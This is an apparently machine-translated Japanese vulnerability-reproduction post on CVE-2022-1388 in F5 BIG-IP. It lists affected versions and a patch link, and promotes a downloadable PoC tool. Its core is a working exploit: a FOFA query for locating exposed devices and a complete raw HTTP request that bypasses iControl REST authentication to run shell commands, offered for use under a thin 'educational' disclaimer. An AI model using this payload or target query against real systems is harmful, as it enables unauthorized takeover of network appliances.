記事ディレクトリ
F5 BIG-IP にはリモート コマンド実行の脆弱性があります (CVE-2022-1388)
免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。
1. F5 BIG-IP の概要
WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。
F5 BIG-IPは、米国F5社のネットワークトラフィック管理、アプリケーションセキュリティ管理、負荷分散などの機能を統合したアプリケーション配信プラットフォームです。
2. 脆弱性の説明
F5 BIG-IPは、米国F5社のネットワークトラフィック管理、アプリケーションセキュリティ管理、負荷分散などの機能を統合したアプリケーション配信プラットフォームです。F5 BIG-IP にはアクセス制御エラーの脆弱性が存在し、非公開のリクエストを介して攻撃者によって悪用され、BIG-IP の iControl REST 認証をバイパスして、影響を受けるシステムの制御を取得する可能性があります。リモートコマンド実行の脆弱性を引き起こす可能性がある
CVE ID: CVE-2022-1388
CNNVD ID: CNNVD-202205-2141
CNVD ID:
3. バージョンに影響を与える
- BIG-IP バージョン 16.1.0 ~ 16.1.2 (パッチリリース)
- BIG-IP バージョン 15.1.0 ~ 15.1.5 (パッチリリース)
- BIG-IP バージョン 14.1.0 ~ 14.1.4 (パッチリリース)
- BIG-IP バージョン 13.1.0 ~ 13.1.4 (パッチリリース)
- BIG-IP バージョン 12.1.0 ~ 12.1.6 (サポート終了)
- BIG-IP バージョン 11.6.1 ~ 11.6.5 (サポート終了)
4. fofaクエリステートメント
title=“BIG-IP®- リダイレクト”
5. 脆弱性の再発
脆弱性リンク: http://127.0.0.1/mgmt/tm/util/bash
脆弱性データ パッケージ:
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
{"command": "run" , "utilCmdArgs": "-c id" }
6.POC&EXP
公式アカウント Nanfeng Vulnerability Recurrence Library をフォローし、Vulnerability Recurrence 30 に返信して POC ツールのダウンロード アドレスを取得します。
使用法:
python3 CVE-2022-1388.py -u http://127.0.0.1:8080
7. 是正意見
現在、メーカーはこの脆弱性を修正するアップグレード パッチをリリースしています。パッチを入手するためのリンクは次のとおりです: https://support.f5.com/csp/article/K23605346